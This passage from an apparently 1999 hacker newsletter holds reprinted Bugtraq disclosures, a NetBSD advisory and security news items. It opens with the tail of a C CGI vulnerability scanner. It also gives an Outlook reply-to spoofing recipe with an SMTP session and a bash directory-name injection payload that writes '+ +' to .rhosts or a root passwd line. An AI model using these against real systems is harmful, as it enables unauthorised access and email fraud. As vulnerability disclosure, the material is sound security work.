(_) (_) (_) (_) (___/(_) (_)"); printf("\n Presents"); printf("\n [ Cgi Scanner ]"); printf("\n v3.0"); printf("\n ### - undernet.org "); printf("\n"); printf("\nUsage: ./cgi www.server.com\n"); printf("\n"); exit(0); } if (argc>2) { if(strstr("-d",argv[2])) { debugm=1; } } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("\n _ _ __ ___ _ _ _ _ __ ___ _ _ _ _ __ ___ _ _ "); printf("\n( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( )"); printf("\n ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( "); printf("\n(_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) (_)"); printf("\n Presents"); printf("\n [ Cgi Scanner ]"); printf("\n v3.0"); printf("\n ### - undernet.org "); printf("\n"); printf("\nCgi Scan v3.0"); printf("\n\nPress any key to continue\n\n"); getchar(); printf("\nReceiving Httpd Version\n\n"); send(sock, "HEAD / HTTP/1.0\n\n",17,0); recv(sock, buffer, sizeof(buffer),0); printf("%s",buffer); close(sock); printf("\n\nReceiving Cgi Details\n\n"); while(count++ < 43) { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } for(numin=0;numin < 1024;numin++) { cgibuff[numin] = '\0'; } send(sock, buff[count],strlen(buff[count]),0); recv(sock, cgibuff, sizeof(cgibuff),0); cgistr = strstr(cgibuff,foundmsg); if( cgistr != NULL) { printf("%s :",cginame[count]); printf(" Found\n"); } } printf("\nScan Complete\n\n"); printf("\nv0rt-fu -- ### undernet.org\n\n"); } @HWA 30.0 MS Outlook, spoof yer reply-to address? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 20 Apr 1999 15:10:05 -0700 From: Nate Lawson To: BUGTRAQ@netspace.org Subject: Outlook 98 allows spoofing internal users Problem: Outlook uses a sender's Reply-To address silently, allowing a user to inadvertently send data to an Internet mail account when intending to reply to an internal, trusted user. Impact: Anyone on the Internet can spoof a trusted internal Exchange user and get replies sent back to themself without the user knowing they weren't responding to another internal user. How to reproduce: 1. Spoof mail as an internal user with a Reply-To address claiming to be an internal user, but an address of an Internet account, say hotmail. 2. Go into Outlook and read the mail. The mail looks like it was internally generated but viewing the full Internet headers under View->Options shows the bogus Reply-To header. 3. Hit Reply in Outlook. The To: field looks like it's going to a valid internal user, but right clicking on it and choosing Properties shows that the internal user it is sending the reply to is actually an Internet address. 4. Enter some text and hit Send. Observe that the mail went to the attacker's account, not the internal one. A quick script: {root 5:00pm} ~> telnet mail.example.com 25 Trying 10.20.2.5... Connected to mail.example.com. Escape character is '^]'. 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready helo losebag 250 OK mail from:<> 250 OK - mail from <> rcpt to: 250 OK - Recipient data 354 Send data. End with CRLF.CRLF >From: Nate Lawson To: Accounting Reply To: Nate Lawson Subject: important! Please reply with the latest copy of our sales figures! Thanks, Nate . 250 OK quit 221 closing connection Connection closed by foreign host. Now, a reply to the email will go not to the trusted internal user Nate Lawson but to the attacker, . Worse, the user sees no indication that the mail is outward-bound! The To: field on the reply simply shows "Nate Lawson", a valid internal user. Affected programs: Only tested on Outlook 98 Known use of this bug to get confidential information: none yet Suggested Fix: always show the full email address of any recipient that is not local (i.e. username@example.com would be hidden but any instance of user@hotmail.com would be shown) Microsoft has been notified, but claimed this was a weakness in SMTP and would not be fixed until a secure successor to SMTP is implemented. They obviouly missed the point -- the error is not in that mail can be forged, but that Outlook allows a user to respond to a message that looks local and legitimate, but is actually destined for an outside address. -Nate ----------------------------------------------------------------------- Date: Sun, 25 Apr 1999 18:36:11 +0200 From: Peter van Dijk To: BUGTRAQ@netspace.org Subject: Re: Outlook 98 allows spoofing internal users On Tue, Apr 20, 1999 at 03:10:05PM -0700, Nate Lawson wrote: > > Suggested Fix: always show the full email address of any recipient that is > not local (i.e. username@example.com would be hidden but any instance of > user@hotmail.com would be shown) Yeah, like: I am user@aol.com and I'd like outlook to hide evilhacker@aol.com. Outlook should not be hiding anything.. Greetz, Peter -- | 'He broke my heart, | Peter van Dijk | I broke his neck' | peter@attic.vuurwerk.nl | nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl | | Hardbeat@undernet - #groningen/#kinkfm/#vdh | @HWA 31.0 Bash parsing vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 20 Apr 1999 21:25:47 -0400 From: Shadow To: BUGTRAQ@netspace.org Subject: Bash Bug Figured while everyone was working with bash, I might as well make this one public(I apologize if this is old news, apparently it hasnt been fixed if so). If a user creates a directory with a command like mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " and someone cd's into said directory, either by accident, or whatever, then it will cause it to actually execute. I also did this with a passwd file, echo a user such as r00t::0:0:\57root\57bin\57bash instead of + + to the rhosts. Played with symlinks and a few other ways to see if perhaps maybe the system could trip it if a user made the directory in say /tmp. Granted it may be a long shot on the users part, the ability to do so is a bad thing IMHO. This didnt seem to work on any of my BSD boxes. shadow - CLE ------------------------------------------------------------------------- Most Failure is due to giving up, not realizing how close to success you were - Thomas Edison ------------------------------------------------------------------------- ---------------------------------------------------------------------------- Date: Thu, 22 Apr 1999 13:10:52 +0200 From: Henrik Nordstrom To: BUGTRAQ@netspace.org Subject: Re: Bash Bug Parts/Attachments: 1 Shown 21 lines Text 2 Shown 20 lines Text ---------------------------------------- Shadow wrote: > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " > > and someone cd's into said directory, either by accident, or whatever, > then it will cause it to actually execute. It is a vulnerability of the prompt parsing, or more specifically the \w or \W prompt escapes for showing the current directory. These get parsed before backquote parsing of the prompt string. Workaround: Make sure the variable PS1 is set to something not including the above escapes when cd'ing into directories with backquotes or $ as part of their name. Patch for bash-1.14.7 attached. bug-bash@prep.ai.mit.edu has been notified. -- Henrik Nordstrom [ Part 2: "Attached Text" ] --- parse.y.orig Thu Apr 22 11:53:01 1999 +++ parse.y Thu Apr 22 12:56:34 1999 @@ -2729,6 +2729,17 @@ #else getwd (t_string); #endif /* EFFICIENT */ + if (strcspn(t_string, slashify_in_quotes) < strlen(t_string)) { + char t_string2[MAXPATHLEN]; + int i, j; + for (i = 0, j = 0 ; t_string[i] && j < MAXPATHLEN - 2 ; i++) { + if (member(t_string[i], slashify_in_quotes)) + t_string2[j++] = '\\'; + t_string2[j++] = t_string[i]; + } + t_string2[j] = '\0'; + strcpy(t_string, t_string2); + } if (c == 'W') { ---------------------------------------------------------------------------- Date: Wed, 21 Apr 1999 20:39:48 EDT From: Andy Church To: BUGTRAQ@netspace.org Subject: Re: Bash Bug >Figured while everyone was working with bash, I might as well make this >one public(I apologize if this is old news, apparently it hasnt been fixed >if so). > >If a user creates a directory with a command like > >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " > >and someone cd's into said directory, either by accident, or whatever, >then it will cause it to actually execute. Just to clarify, this only happens if PS1 (the bash prompt) contains \w or \W _and_ a prompt is displayed containing the bogus directory name. This means unattended shell scripts are safe. As a workaround, use `pwd` in place of \w. Tested with bash 1.14 (it's the only one I have handy). --Andy Church achurch@dragonfire.net http://achurch.dragonfire.net/ ---------------------------------------------------------------------------- Date: Thu, 22 Apr 1999 03:18:48 +0200 From: Marc Lehmann To: BUGTRAQ@netspace.org Subject: Re: Bash Bug On Tue, Apr 20, 1999 at 09:25:47PM -0400, Shadow wrote: > > If a user creates a directory with a command like > > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " It seems to me that this is related to the prompt string parsing. If yes, then bash is not vulnerable unless configured to display the current directory (correct me if the root of the problem is different). Some additional notes: - I was unable to reproduce this on my system, even when bash is configured to display the current path in the prompt. (bash 2.02.1(1)) - The original example seemed to have too much whitespace. I used: mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\`" - PS1 was set to \h:\w\$ HTH -- -----==- | ----==-- _ | ---==---(_)__ __ ____ __ Marc Lehmann +-- --==---/ / _ \/ // /\ \/ / pcg@goof.com |e| -=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE --+ The choice of a GNU generation | | ---------------------------------------------------------------------------- Date: Thu, 22 Apr 1999 11:16:06 +0200 From: Pavel Kankovsky To: BUGTRAQ@netspace.org Subject: Re: Bash Bug On Tue, 20 Apr 1999, Shadow wrote: > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " Bash 1.x screws up during PS1 substitution (\w, \W). Bash 2.x does not seem to be vulnerable. Anyway, there's a hope even for those who want to stick to 1.x: replace \w with $PWD, \W with ${PWD##*/} (no guarantee). --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] "NSA GCHQ KGB CIA nuclear conspiration war weapon spy agent... Hi Echelon!" ---------------------------------------------------------------------------- Date: Fri, 23 Apr 1999 00:02:57 +0300 From: Guy Cohen To: BUGTRAQ@netspace.org Subject: Re: Bash Bug At this (Wed, Apr 21, 1999 at 08:39:48PM -0400) day, Andy Church wrote: .| >If a user creates a directory with a command like .| > .| >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " .| > .| Just to clarify, this only happens if PS1 (the bash prompt) contains .| \w or \W _and_ a prompt is displayed containing the bogus directory name. .| This means unattended shell scripts are safe. As a workaround, use `pwd` .| in place of \w. .| Unfortunately this is not true. here is why: rush:/tmp> bash --version GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu) Copyright 1998 Free Software Foundation, Inc. rush:/tmp> bash bash-2.03$ echo $PS1 \s-\v\$ bash-2.03$ cat ~/.rhosts cat: /export/home/guy/.rhosts: No such file or directory bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " bash-2.03$ cd \\\ \ / bash-2.03$ cat /export/home/guy/.rhosts\ + + sh-2.03$ -- Guy Cohen ---------------------------------------------------------------------------- Date: Thu, 22 Apr 1999 17:43:24 -0400 From: Daniel Jacobowitz To: BUGTRAQ@netspace.org Subject: Re: Bash Bug On Fri, Apr 23, 1999 at 12:02:57AM +0300, Guy Cohen wrote: > Unfortunately this is not true. here is why: > rush:/tmp> bash --version > GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu) > Copyright 1998 Free Software Foundation, Inc. > rush:/tmp> bash > bash-2.03$ echo $PS1 > \s-\v\$ > bash-2.03$ cat ~/.rhosts > cat: /export/home/guy/.rhosts: No such file or directory > bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " > bash-2.03$ cd \\\ \ / > bash-2.03$ cat /export/home/guy/.rhosts\ > + + > sh-2.03$ That's a quoting error. Look at the mkdir command you typed, and observe that the backticks are not escaped - thus even inside of "" they are evaluated. Witness: $ ls /drow/.rh* ls: /drow/.rh*: No such file or directory $ echo $PS1 \$ $ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " $ ls /drow/.rhosts\ /drow/.rhosts It doesn't even get .rhosts right - there's a space at the end. You told bash to make the directory: `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` Dan /--------------------------------\ /--------------------------------\ | Daniel Jacobowitz |__| CMU, CS class of 2002 | | Debian GNU/Linux Developer __ Part-Time Systems Programmer | | dan@debian.org | | drow@cs.cmu.edu | \--------------------------------/ \--------------------------------/ ---------------------------------------------------------------------------- Date: Thu, 22 Apr 1999 15:44:35 -0400 From: Chet Ramey Reply-To: chet@po.CWRU.Edu To: BUGTRAQ@netspace.org Subject: Re: Bash Bug > On Tue, 20 Apr 1999, Shadow wrote: > > > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " > > Bash 1.x screws up during PS1 substitution (\w, \W). Bash 2.x does not > seem to be vulnerable. Anyway, there's a hope even for those who want to > stick to 1.x: replace \w with $PWD, \W with ${PWD##*/} (no guarantee). This is correct; the bug was fixed in bash-2.0, which was released in December, 1996. If you're still running 1.14.x, or earlier versions, you should upgrade to bash-2.03. -- ``The lyf so short, the craft so long to lerne.'' - Chaucer ( ``Discere est Dolere'' -- chet) Chet Ramey, Case Western Reserve University Internet: chet@po.CWRU.Edu ---------------------------------------------------------------------------- Date: Fri, 23 Apr 1999 11:25:58 +0100 From: Ph. Rueegsegger To: BUGTRAQ@netspace.org Subject: Re: Bash Bug Date sent: Thu, 22 Apr 1999 01:39:48 +0100 Send reply to: Andy Church >From: Andy Church Subject: Re: Bash Bug Originally to: shadow@OPERATOR.ORG To: BUGTRAQ@netspace.org Hello together > >Figured while everyone was working with bash, I might as well make this > >one public(I apologize if this is old news, apparently it hasnt been fixed > >if so). > > > >If a user creates a directory with a command like > > > >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " Not bad ! > > > >and someone cd's into said directory, either by accident, or whatever, > >then it will cause it to actually execute. > > Just to clarify, this only happens if PS1 (the bash prompt) contains > \w or \W _and_ a prompt is displayed containing the bogus directory name. > This means unattended shell scripts are safe. As a workaround, use `pwd` > in place of \w. Sorry, with bash version 2.01.1 (supplied with SuSE5.3) is just the opposite of what you are clarifying. If one has \w or \W specified in PS1 to show the path, it does NOT happen and if `pwd` is specified instead of \w or \W it DOES happen. > > Tested with bash 1.14 (it's the only one I have handy). > > --Andy Church > achurch@dragonfire.net > http://achurch.dragonfire.net/ Kind regards Phibus ----------------------------------------------------------- Philip Rueegsegger System Manager Bruker AG Direct dial : +41-1-825 93 46 Industriestrasse 26 Telephone : +41-1-825 91 11 CH-8117 Faellanden Telefax : +41-1-825 94 69 Switzerland E-Mail : philip.rueegsegger@bruker.ch ----------------------------------------------------------- ---------------------------------------------------------------------------- Date: Tue, 27 Apr 1999 16:38:15 +0200 From: Peter J. Holzer To: BUGTRAQ@netspace.org Subject: Re: Buffer overflow in BASH On 1999-04-19 14:59:06 -0400, Adam D. McKenna wrote: > I really don't see the point of people posting bash bugs here. > Especially not bugs in old versions. There are a lot of bash bugs, you > can't gain any extra priveleges by exploiting them though. You can, if you can trigger the bug in a script which is not running with your privileges - suid and cgi scripts are obvious examples. So, posting bash bug reports at least reminds people that using bash - especially old versions - for such scripts is not a good idea. hp -- _ | Peter J. Holzer | Where do you want your keys |_|_) | Sysadmin WSR / Obmann LUGA | to go today? | | | hjp@wsr.ac.at | -- Tom Perrine __/ | http://wsrx.wsr.ac.at/~hjp/ | on bugtraq 1999-04-20 @HWA 32.0 NetBSD Security Advisory 1999-009 Date: Wed, 21 Apr 1999 11:19:23 +1000 From: matthew green To: BUGTRAQ@netspace.org Subject: NetBSD Security Advisory 1999-009 -----BEGIN PGP SIGNED MESSAGE----- NetBSD Security Advisory 1999-009 ================================= Topic: SVR4 compatibility device creation vulnerability Version: NetBSD 1.3.3 and prior; NetBSD-current until 19990420 Severity: Local users can access and modify any data on first IDE disk Abstract ======== In order to provide a system environment capable of executing System V Release 4 (`SVR4') binaries, it is necessary to create a set of device special files; to simplify this task, a shell script is shipped with the system. Due to a mismatch of device major numbers between NetBSD platforms, one device special file is erroneously created with a wrong major number, which may allow a regular user to arbitrarily read or write any data stored on the NetBSD portion of the first IDE disk configured by the system. This vulnerability is restricted to the i386 port of NetBSD with SVR4 emulation additionally configured only. Technical Details ================= The SVR4 /dev/wabi character device special file, usually created below the /emul/svr4 hierarchy, is currently supposed to be a synonym for the /dev/null device special file. Originally developed on the sparc port of NetBSD, the SVR4_MAKEDEV shell script creates this file with a major number of 3 and a minor number of 2, setting these properties equivalent to those of the /dev/null device special file on that platform. On the i386 port of NetBSD, the character device major number 3 is associated with the wd(4) driver, which supports IDE (and compatible) disks, and whose minor number 2 denotes the NetBSD portion of the first such disk configured by the systems; this corresponds to the special device file /dev/rwd0c in the base distribution. As the /dev/wabi special device file is created with world read and write permissions, a regular user may read and write any data stored on that portion of the disk. The effects of actually running the WABI software on a vulnerable system have not been investigated. Solutions and Workarounds ========================= A patch is available for the NetBSD 1.3.3 which makes the SVR4_MAKEDEV shell script create the wabi device special file with the correct properties. You may find this patch on the NetBSD ftp server: ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990419-SVR4_MAKEDEV NetBSD-current since 19990420 is not vulnerable. Users of NetBSD-current should upgrade to a source tree later than 19990420. Once the SVR4_MAKEDEV script is updated, re-run it to recreate the wabi device with the correct parameters. If this action cannot be taken, an immediate workaround is to remove the existing device special file and creating a new one, which can be done by executing the following shell command sequence as the super-user: # /bin/rm -f /emul/svr4/dev/wabi # /sbin/mknod /emul/svr4/dev/wabi c 2 2 # /bin/chmod u=rw,g=rw,o=rw /emul/svr4/dev/wabi Thanks To ========= The vulnerability was discovered by Klaus Klein , who also provided the solution and authored this advisory. Revision History ================ 1999/04/17 - initial version 1999/04/19 - dates were incorrect More Information ================ Information about NetBSD and NetBSD security can be found at http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/. Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved. $NetBSD: NetBSD-SA1999-009.txt,v 1.2 1999/04/19 15:07:52 mrg Exp $ -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBNxwkvz5Ru2/4N2IFAQEbuQQAtv2ho3MWYYihmZBagGnX6Wd0KD+mTIh0 liV32yx46kVELmCGrS4pEQh3fBNNgYkYBjympKrC/Iy1Vj9DMAMBNLGedFu10yXT oJnKLcmNmjEE8qRnqwjBRUIn/kURvG6wakgC9n6OuCOIcdtYeiUmgFhoPyl4lzKf FRpxHkqZnLo= =9Ypx -----END PGP SIGNATURE----- @HWA 33.0 Explorer favicon.ico bug introduces new vulnerabilties ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 16 Apr 1999 22:11:22 -0700 From: "Robert David Graham" Subject: favicon.ico In case you haven't heard, Microsoft has a new feature in IE 5.0 web browser. When you add a website to you "Favorites" (aka. Bookmarks for you Netscape users), the browser attempts to download a graphic called "favicon.ico", then show that icon along with the title of the webpage. This has two risks. First of all, the website owner is notified when you the page to your favorites, revealing information about yourself. A discussion of this can be found at http://msdn.microsoft.com/workshop/essentials/versions/ICPIE5.asp This privacy risk is probably minor, but I've seen several press articles on the subject. The second RISK is much more severe. Go to AltaVista (or any search engine) and search for "favicon.ico". You now have a list of 500 websites that expose their access logs. In the logs, you can find several websites that expose the URLs of CGI scripts, including passwords. Through manual searching, I found 2 sites that exposed logon information; I'm sure I can write a program that would scan those logs to look for CGI programs and get even more. This also exposes even more privacy information because these logs often contain the Referer field as well. This isn't unique to "favicon.ico". The RISK is really: * people are unintentionally exposing access logs on their web sites, exposing user information and possible passwords. * hackers can easily find vulnerable systems not by scanning the site itself (which can be detected by intrusion detection systems), but by searching a 3rd party like AltaVista. Robert Graham CTO, Network ICE http://www.networkice.com/advice @HWA 34.0 Lets hear it for CERT the good guys! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ via HNN http://www,hackernews.com/ CERT the Good Guys? contributed by turtlex Obviously written by someone who didn't even bother looking for an opposing viewpoint this ABC News article praises CERT for all the good work that they have done. While CERT does try lets not forget that they are in bed with the vendors are usually several months late with advisories. This article ignores all of that and labels them as "the users last hope". ABC News; http://abcnews.go.com/sections/tech/DailyNews/cert990422.html The Internet’s Men in Black CERT Serves and Protects Netizens By Michael J. Martinez ABCNEWS.com April 24 In November 1988, a student at Cornell University unleashed a worm, or self-replicating computer program, upon the nascent Internet. The worm invaded the academic computers that hosted the Net, hogging all of their processing power. Though the worm invaded fewer than 5 percent of the host computers, the entire system was shut down for days while an ad hoc team of academics struggled to eject it. Officials at the U.S. Defense Department, which sponsored the original ARPANET and its evolution to the Internet, quickly decided that coordinated efforts were needed to combat such invasions. Thus was born the Computer Emergency Response Team Coordination Center (CERT/CC, commonly known as CERT). In the 10 years since, the 15-member CERT, hosted by the Software Engineering Institute at Carnegie Mellon University, has become the de facto defender of the Internet, helping users around the world protect themselves from all sorts of computer menaces. Users’ Last Hope Many corporations, government agencies and universities now have their own computer emergency response teams. CERT was the first, and it still has the broadest charter of any such team: protect the Internet. We’re kind of the last hope for a lot of people, says Jeff Carpenter, head of the incident response team at CERT. When administrators can’t figure out what’s going on, they call us. CERT gets dozens of phone calls and e-mails every day from system administrators (sysadmins, in the industry jargon) around the world, describing virus infestations, minor system infiltrations and widespread attacks by malicious hackers. We’ve seen almost everything, Carpenter says. A very small percentage of what we receive are reports of new problems. There’s very little out there that really surprises us. The Melissa virus, which made global headlines in late March, was nothing new to CERT except for the fact that it spread faster than nearly anything else seen before. The CERT team put out an advisory on Melissa within days of its release, after a marathon overnight analysis session. The virus appeared on a Friday; the advisory was posted on the CERT Web site early Saturday morning. In Melissa’s case, we put out the alert because we knew it would become far worse without that kind of awareness, Carpenter says. We knew that people would come in on Monday and if they weren’t warned, they’d start spreading it even further. Advisers, Not Policemen One of the common misconceptions about CERT is that it exists to catch malicious hackers and virus writers. But CERT is not a law enforcement agency. Instead, the center focuses on responding quickly to specific attacks and to potential vulnerabilities, and making sure they don’t happen again. The center is divided into two teams: the incident response team and the vulnerability assessment team. While the incident response team helps system administrators recover from a hacking or virus incident, the vulnerability assessment team responds to inquiries about inherent software problems. These problems don’t come in from security researchers or anything like that, says Shawn Hernan, who heads the vulnerability team. These are from sysadmins who are probably using their software in ways that the vendor might not have considered. Preventive Measures So far this year, there have been only four major CERT advisories. Besides the Melissa virus, two spelled out new tricks in the placement of Trojan horse programs (applets that appear harmless, but release viruses or hacking tools once activated). The fourth dealt with a variation on an old way to sneak programming code into a server. The rest of the time, CERT team members advise system administrators and software vendors on the best ways to protect themselves. You would really be amazed at how many people just don’t take the time to download the patches they need from their software and anti-virus vendors, Carpenter says. We always tell them to make sure that every single patch is installed. Otherwise it’s fairly easy for an intruder to gain access. CERT is really invaluable, says Motoaki Yumamura, an anti-virus researcher at Symantec Corp. They give us a lot of great information, which we can translate into products to help our customers. For CERT researchers, however, the responsibilities and rewards go beyond commercial concerns. The Internet is the best opportunity for new and exciting societal changes says Hernan. To work in an organization like CERT is to have a positive effect on the Internet. @HWA 35.0 NASA finds scapegoat? - Programmer indicted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www,hackernews.com/ April 29th NASA Finds Scapegoat? contributed by Dave Merritt After notifying NASA of several serious security holes, of which anyone with a login account could access, NASA chose to cover it up and make a scapegoat out of the individual. This news article has twisted the story to make it seem that Dave Merritt had malicious intentions while he claims he was trying to help by pointing out possible vulnerabilities. Mr. Merritt is seeking legal representation. If anyone can help please contact us here. (Why is a case against NASA being prosecuted by a County DA, doesn't the fact that it is NASA make it a federal crime?) Houston Chronicle http://www.chron.com/cgi-bin/auth/story.mpl/content/interactive/space/news/99/990427.html April 26, 1999, 08:39 p.m. Programmer who allegedly broke into NASA computers is indicted By STEVE BREWER Copyright 1999 Houston Chronicle A programmer who once wrote software for the international space station was indicted Monday on accusations that he took a code-breaking program off the Internet and used it to explore NASA computers. David Merritt, 41, was charged with breach of computer security, said Assistant Harris County District Attorney Terry Jennings. Bail was set at $2,000, and Merritt was scheduled to turn himself into authorities. Jennings said no serious damage was done to NASA's computers and that Merritt only used the illegal access to explore parts of the system he couldn't normally get into. But, Jennings said, NASA spent $19,000 in man-hours to investigate the problem and ensure Merritt hadn't caused any permanent harm. In such cases, the prosecutor added, those expenditures are counted as criminal damages. Lance Carrington, NASA's acting assistant inspector general in Washington D.C., told the Chronicle Monday that much of the effort in these inquires is usually spent ensuring that no one can access the computers the same way again. Carrington's office conducted the initial investigation into Merritt's case. Jennings said the hacking occurred between May 14 and 18 at NASA's Sonny Carter Training Facility, where Merritt was working on the space station project. He worked for Geo Control Systems, a Clear Lake company, which was a subcontractor to Boeing, NASA's prime contractor on the project. For his job, Merritt had limited access to the system used to write software, but somehow he got encrypted passwords of other users and downloaded them to his desktop, Jennings said. He then used an Internet password-cracking tool called "John the Ripper" to decipher them. Armed with the passwords, Merritt then accessed other parts of the NASA computer system, Jennings said, then later told a supervisor he had "found" the passwords. A Geo Control Systems employee fielding questions on the case would only identify himself by his first name when contacted by the Chronicle Monday. Other than to say that Merritt no longer worked for the company, he said he would only comment on the case if the name of the company was not published. Carrington said Merritt's case is relatively minor. But he said the fact that code-breaking technology is easily available on the Internet concerns government agencies that depend on high-tech computers. "Because of the climate today with the evolving technology, we're overly sensitive to it. It's very disconcerting that this information is out there," Carrington said. "It makes life tough that you've got to deal with people like that -- people who know their stuff and amateurs who can get this information that's becoming more user-friendly. Carrington said NASA has handled several high-profile cases in which hackers have breached agency systems. NASA has begun hiring experts who once worked for the military and the National Security Agency to investigate those kinds of cases. The near six-year task of assembling the space station began last year. It's not staffed at this point. The project is led by the United States, and its partners include Russia, Europe, Japan and Canada. The charge against Merritt is a state jail felony, punishable by up to two years in jail and up to a $10,000 fine. Chronicle reporter Mark Carreau contributed to this story. @HWA 36.0 CIH author found? ~~~~~~~~~~~~~~~~~ CIH Author Identified? From HNN http://www.hackernews.com/ April 29th contributed by mdef The Tatung Institute of Technology claims that it has found the author of the CIH or Chernobyl virus. They claim that they had punished Chen Ing-hau last April when the virus he wrote as a student began to cause damage in an inter-college data system, according to Lee Chee-chen, the institute's dean of student affairs. Chen Ing-hau has since graduated and is currently serving his compulsory two year stint in the Taiwanese military. CNN http://www.cnn.com/TECH/computing/9904/29/computer.virus.ap/index.html Nando Times http://www.techserver.com/story/body/0,1634,43487-70127-507733-0,00.html CNN; Taiwan college identifies computer virus author April 29, 1999 Web posted at: 9:32 a.m. EDT (1332 GMT) TAIPEI, Taiwan (AP) -- A former computer engineering student was identified by his college today as the author of the Chernobyl virus -- the menace that caused hundreds of thousands of computer meltdowns around the world this week. The Tatung Institute of Technology had punished Chen Ing-hau last April when the virus he wrote as a student began to cause damage in an inter-college data system, according to Lee Chee-chen, the institute's dean of student affairs. Chen, who was a senior at the time, was given a demerit but not expelled. The Chernobyl virus is known in Taiwan as the CIH, using Chen's initials. The college did not mete out a more severe punishment because Chen had warned fellow students not to spread the virus, Lee said. Chen did not come up with an anti-virus program, Lee said. Lee said he was not sure how the virus ended up causing so much destruction a year later. Chen graduated from the college last summer and now is serving Taiwan's two-year compulsory military service, Lee said. Officials of the Bureau of Criminal Investigation said they would seek permission to question Chen. The unusually destructive virus -- timed to strike on April 26, the 13th anniversary of the Chernobyl nuclear disaster -- tries to erase a computer's hard drive and write gibberish into its system settings to prevent the machine from being restarted. Turkey and South Korea each reported 300,000 computers damaged Monday, and there were more elsewhere in Asia and the Middle East. Fewer than 10,000 of the 50 million computers in the United States were affected. Copyright 1999 The Associated Press. All rights reserved. @HWA 37.0 INTEL goes after Zero Knowledge Systems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com April29th Intel goes after Zero Knowledge contributed by Carole Zero Knowledge Systems has found a way to make the PIII serial number, that had been hidden, visible without the knowledge of the computer owner. Intel, using its large corporate muscle has persuaded Symantec to included the Zero Knowledge software as part of Norton AntiVirus and have it flagged as malicious code. Now when a Norton user visits the Zero Knowledge Web site the AV detections software goes off. Intel and Zero Knowledge are reportedly in discussions over this matter. C|Net http://www.news.com/News/Item/0,4,35834,00.html?st.ne.fd.tohhed.ni ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2249416,00.html Intel http://www.intel.com Zero Knowledge Systems http://www.zks.net/ C|Net; Intel still wrestling serial number debacle By Reuters Special to CNET News.com April 29, 1999, 2:40 p.m. PT URL: http://www.news.com/News/Item/0,4,35834,00.html Intel, the world's leading chipmaker, is still grappling with a consumer-relations problem that stems from its decision to embed a serial number in its Pentium III micro chips, according to reports. Intel in January reacted quickly to complaints from privacy advocates about the serial numbers by distributing software that enabled owners of computers containing Pentium III chips to hide the number. But the problem has not gone away, the New York Times reported today. The newspaper reported that a small Canadian software maker has found a way to make the serial number, that has been hidden, visible without the knowledge of the computer owner. The problem is not new. On March 10, Montreal-based Zero-Knowledge developed an ActiveX control that retrieved the serial number under certain circumstances, even after a software repair released by Intel disabled the feature and ostensibly "hid" the number from prying eyes. Then, on March 19, antivirus software firm Symantec announced it would provide "detection and elimination" of the Pentium III hack from Zero-Knowledge on its Web site for download. Symantec also said it would be part of its regular weekly virus definitions. The Times report, however, seems to indicate that a war of words has continued to linger over the issue. Intel has reacted by persuading Symantec to include the Zero-Knowledge program on its list of malicious programs. Consequently, users who visit the Zero-Knowledge site get a warning that the program is a virus. Zero-Knowledge executives have said that Intel has unfairly portrayed it as outlaws, the newpaper said. The issue of the serial number has been a volatile one for Intel because privacy advocates have said the serial number allows direct marketers and data-mining companies to track the patterns of Web surfers. They also say it is a poor way to protect against theft, the initial purpose of the serial number. An Intel spokesman said the company has been discussing the vulnerability of the serial number with Zero-Knowledge executives, the newspaper reported. News.com's Michael Kanellos contributed to this report. Story 